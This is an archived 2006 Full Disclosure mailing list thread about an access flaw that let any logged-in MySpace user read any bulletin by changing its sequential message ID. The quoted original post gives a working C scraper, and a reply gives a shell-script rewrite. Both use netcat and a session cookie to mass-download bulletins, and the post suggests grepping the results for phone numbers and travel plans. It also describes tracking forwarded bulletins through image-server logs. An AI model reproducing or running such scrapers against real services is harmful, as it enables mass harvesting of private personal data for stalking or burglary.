Full Disclosure mailing list archives
Re: Data Mining Myspace Bulletins
From: "Morgan Reed" <morgan.s.reed () gmail com>
Date: Sun, 2 Jul 2006 17:03:07 +1000
Or if you must use netcat don't use system() write a shell script. ================================================ #!/bin/sh if [ $# != 2 ]; then echo "Usage: "$0" <start> <end>" exit 1 fi if [ $1 -gt $2 ]; then echo "end must be greater than start" exit 2 fi recs=$(( $2-$1+1 )) for (( i=0; i<recs; i++ )); do echo "GET /index.cfm?fuseaction=bulletin.read&messageID="$(($i+$1))".lf HTTP/1.1" > new_request.txt cat request.txt >> new_request.txt echo "Downloading bulletin #"$(($i))" of "$(($recs - 1))" "$(($recs-$i-1))" remaining" nc -w2 bulletin.myspace.com 80 < new_request.txt > bulletin/$(($i+$1)).lf.html done ================================================ Untested 5 minute hack but should work identically to the C PoC. On 7/2/06, GroundZero Security <fd () g-0 org> wrote:
Couldn't you have used sockets? Its just a simple connect() whats the big deal..Using netcat trusting the env and using system() is baaad :-) ----- Original Message ----- From: "John Hackenger" <stderr () pandora-security com> To: <full-disclosure () lists grok org uk> Sent: Saturday, July 01, 2006 12:38 AM Subject: [Full-disclosure] Data Mining Myspace Bulletins > Myspace Bulletins: The good, the bad, and the ugly > > Data Mining Myspace, a case study > > Author: stderr (stderr () pandora-security com) > http://stderr.linuxinit.net > > Original release: > http://www.pandora-security.com > > ------------------------------------------------------ > > 1. Abstract > > We all know about myspace.com, and I'll go ahead and admit > that I actually have an account to keep up with friends. > Myspace is full of a bunch of idiots, but it can be a great > tool for keeping up with people... when used properly. > > Myspace has long been a hacker playground, you may remember > the infamous "Samy is my hero" "worm". The "worm" took advantage > of several poor input validation techniques which were being > employed. Each person that went to a page with his script in it, > automatically sent him a friend request. After this alarming > stunt, Myspace fixed a lot of the injection vulnerabilities. > > ------------------------------------------------------ > > 2. Introduction to Bulletins > > On Myspace, you can send "bulletins" which are sent to all > of the friends on your list. That way if you're going on > vacation or something, you can let ALL of your friends know > what's happening by sending only one message. Most people > assume that only their friends can read the bulletins they > post... they are sadly mistaken. > > When you open up a bulletin, you go to a url like the following. > > http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.read&messageID=111111111 > > Yes, you guessed it. If you change the messageID number, > you can view any bulletin on Myspace that hasn't yet > expired. Now, if we could just collect a ton of bulletins, > then we could surely find some juicy information like > cell phone numbers, when people are leaving for vacation, > where they're going... the list goes on and on. > > The implementation of bulletins so that everyone can view them > may be intentional, but most people assume that bulletins are > only readable by friends. Because of this belief, many people > post personal details in bulletins, never expecting people > like you to read them. The mere existence of the "Delete from > friends" button implies that only friends should be able to > read your bulletins. > > ------------------------------------------------------ > > 3. Mining the data > > I was able to whip together a small C program that generates > urls, retrieves the bulletin, and saves the html to a file. > Once all of the data has been downloaded, it's easy to parse > through using a tool like grep. > > In order for this program to work, you need to download a > tool called 'netcat'. You will also need to get your cookie > once you're logged into myspace, so that you can view the > bulletins. > > First of all, let's create a new file named "request.txt" > The contents should look something like this, but you'll need > to change the cookie to match yours. > > ======================================================= > > Host: bulletin.myspace.com > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) > Gecko/20060414 > Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html > ;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 > Accept-Language: en-us,en;q=0.5 > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 > Keep-Alive: 300 > Connection: keep-alive > Cookie: TIMEZONE=3; > ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK > ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4 > A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83 > 5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x; > NGUserID=a258ca5-2341-1231956342-6; > MYSPACE=myspace; AUTOSONGPLAY=0; > UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x > A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=55555555; rsi_want=0; > COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB > gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3 > D%3D; MSCulture=IP=127.0.0.1&IPCulture=en-US&PreferredCulture=en-US&Country=US; > MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli > AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea > aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda > ALOAJKEIOAJF3ea:LKfoaidjiajsioajlk3jaijdkfhfkjghncx,jlkjaweoijroiajoijadsljfdlksajfij32lja;dljf > aDJFOA:#oKkdjflkaj;ijIOJilj;ioje;ioHiuhNKJhUGJJikhiugygGTYFTJHKHIUgyuhihiugI:HUgugyfTHDGfyjgfff > 2FADFaEFeaDfagFhGHggFgadcAweadddafdasfeafgeaeageaijlkfjai;hj;JIOJlihluhkHUIHKhuilgliuHLIUHLHhhh > h0DSAFOOJaewoi'jfa;ilj;oi:IOnjiehjioh;iH:IH;iohi;hg;juGYFyjfyjflukhaljdkfaejoijlajdlifjealijddd > WIaOJFoa;ejklijdaFOJEaIjo:IJEAOIJEoajf:EOJAjdailjdf;ilaj;lijioj;oije;aojojaoijoiej;oaijo;ij;oij > hNaoijao;ijdoifj;ckxx,jaiojeifajkjnaklhugi834829ijljadflkj3alijadlkjfaeljaclijeakjdoijgealijdcd > Fsaijo;ij3;oaij;oijod;iasj;oijx90asjoij3alij;ioadjf;iojeo;iaj;oij;dkjfkdjlakjdlska; > LASTUSERCLICK=%7bts+'2006-06-21+15%3a64%3a52'%1f; > CAPTCHA=02236762-de4c-133a-a5e2-ff558427f513 > > ======================================================= > > Now that you have the request.txt file all setup, let's go > ahead and compile the C program that will mine the data. > > scan.c > > ======================================================= > > /************************************************* > * scan.c -- Myspace bulletin miner * > * Author: stderr (stderr () pandora-security com) * > * Usage: ./scan 1164147677 1164147678 * > * The ending ID should be greater than the * > * starting ID, that or you could always * > * reverse the loop in the body of the program. * > * * > * (Note) I'm sure this could be done a lot more * > * elegantly, maybe even with perl or something * > * But... this is just a proof of concept, so.. * > * No hating :) * > *************************************************/ > > #include <stdio.h> > #include <stdlib.h> > #include <string.h> > > void usage(char *name); > > int main(int argc, char *argv[]) > { > double id, s_id, e_id; > char x, url[256]; > FILE *in_file, *out_file; > > if (argc != 3) { > usage(argv[0]); > exit(1); > } > > s_id = atoi(argv[1]); > e_id = atoi(argv[2]); > > if (s_id >= e_id) { > printf("The ending ID must be greater than the starting ID\n"); > exit(1); > } > > for (id = s_id; id < e_id; ++id) { > in_file = fopen("request.txt","r"); > out_file = fopen("new_request.txt","w"); > > fprintf(out_file,"GET > /index.cfm?fuseaction=bulletin.read&messageID=%0.lf HTTP/1.1\n",id); > while ((x=fgetc(in_file)) != EOF) > fputc(x,out_file); > fclose(in_file); > fclose(out_file); > > printf("Downloading Bulletin #%0.lf ... %0.lf bulletins > left.\r",id, e_id-id); > sprintf(url,"nc -w2 bulletin.myspace.com 80 < new_request.txt > > bulletin/%0.lf.html\n",id); > system(url); > } > system("pause"); > return 0; > } > > void usage(char *name) > { > printf("%s <start message id> <ending message id>\n",name); > } > > ======================================================= > > Now compile the program, and run something like this... > > ./scan 4264287677 4264287777 > > (Note) Before running the program, you'll need to make a directory > called "bulletin" so that the program will save the bulletins to > their own directory. If you don't like that setup, then change the > code. > > You should now have a bunch of bulletins downloaded, now just grep > through the the "bulletin" directory for the data that you're looking > for. > > ------------------------------------------------------ > > 4. More fun with Bulletins > > If you have a Myspace account, you've undoubtedly encountered a lot of spam > bulletins. Another idea to play with bulletins is be to add an image > in the bulletin, and start forwarding it around. The image that's pointed > to should be on a server where you have access to the logs. Once people > start circulating the bulletin, it's possible to see how many times it's > been forwarded by looking at the referrer. To the best of my knowledge > there's no way of getting the name of each person that reads the > bulletin, but you will obviously have the name of each person that > forwards the bulletin. > > ------------------------------------------------------ > > 5. Closing Statements > > Whether this is a "flaw" that is going to be closed remains to be seen. > As always, just be careful with the information you're posting on the > internet. You never know who's watching. > > Shouts: zipk0der, XPlicit, exvitel, Sonic, and Darcy > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, 1759 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Data Mining Myspace Bulletins GroundZero Security (Jul 01)
- Re: Data Mining Myspace Bulletins Morgan Reed (Jul 02)
- Re: Data Mining Myspace Bulletins John Hackenger (Jul 02)
- <Possible follow-ups>
- Re: Data Mining Myspace Bulletins daylasoul (Jul 02)
- Re: Re: Data Mining Myspace Bulletins Line Noise (Jul 02)
- Re: Re: Data Mining Myspace Bulletins <...> (Jul 03)
- Re: Re: Data Mining Myspace Bulletins Line Noise (Jul 02)
- Re: Data Mining Myspace Bulletins Morgan Reed (Jul 02)